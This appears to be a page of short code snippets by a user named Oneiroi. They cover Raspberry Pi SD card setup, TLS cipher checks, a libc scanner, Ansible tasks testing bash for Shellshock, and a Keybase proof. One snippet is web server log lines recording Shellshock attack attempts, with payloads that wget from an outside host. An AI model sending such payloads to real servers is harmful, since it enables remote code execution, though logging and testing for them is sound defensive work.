Oneiroi

#
# ensure CWD contains dirs root and boot
# ensure sd card has not automounted elsewhere
# ensure ArchARM-rpi2.tgz exists in CWD
# ensure partitions configured as per: http://archlinuxarm.org/platforms/armv7/broadcom/raspberry-pi-2
#
mkfs.vfat /dev/mmcblk0p1 && \
mount /dev/mmcblk0p1 ./boot && \
mkfs.ext4 /dev/mmcblk0p2 && \
mount /dev/mmcblk0p2 ./root && \

Oneiroi

openssl s_client -cipher EXPORT -connect domain.com:443 < /dev/null 2>/dev/null | grep SSL-Session | wc -l

Oneiroi

#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.

Oneiroi

import os, glob, re
def main():
    p = re.compile('^([0-9a-f]+-[0-9a-f]+)\s[a-z\-]{4}\s[0-9a-f]{8}\s[a-z0-9]{2}\:[a-z0-9]{2}\s[0-9]+\s+(.*)$')
    smaps = glob.glob('/proc/[0-9]*/smaps')
    for smap in smaps:
        lines = open(smap).readlines()
        for line in lines:
            m = p.match(line)
            if m and 'libc' in line:
                name = open(smap.replace('smaps','status')).readlines()[0]

Oneiroi

mysql -se "SHOW STATUS LIKE 'Ssl_cipher_list'" | sed 's/:/\n/g' | sed 's/Ssl_cipher_list\s//g' | while read sspec; do SPEC=`openssl ciphers -v "$sspec" 2>/dev/null | grep -v SSLv3 | awk '{print $1}'`; [[ "$sspec" == "$SPEC" ]] && mysql --ssl-cipher=$sspec -e QUIT 2>/dev/null && echo "$sspec OK"; done

Oneiroi

62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:09 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:11 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJ

Oneiroi

- name: Ensure bash is not vulnerable CVE-2014-6271
  command: env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  register: shellshock
  failed_when: "'vulnerable' in shellshock.stdout"
  tags:
    - CVE
    - CVE-2014-6271  

- name: Ensure bash is not vulnerable CVE-2014-7186
  command: bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

Oneiroi

Keybase proof

I hereby claim:

• I am oneiroi on github.
• I am oneiroi (https://keybase.io/oneiroi) on keybase.
• I have a public key whose fingerprint is 1244 78DD E40C FFA1 EFB1 2F2C 22D8 7C7F A34E CF5E

To claim this, I am signing this object:

Oneiroi

#!/bin/bash

/usr/bin/osascript <<-EOF

    tell application "System Events"
        activate
        display dialog "DO STUFF NOW!"
    end tell

EOF

Oneiroi

#!/bin/bash
BREW_RUBY_BIN="/usr/local/Cellar/ruby/1.9.3-p0/bin/"
echo "--- installing pre-requsite gems"
echo "rails
haml
nokogiri
will_paginate
deltacloud-client
simple-navigation
rest-client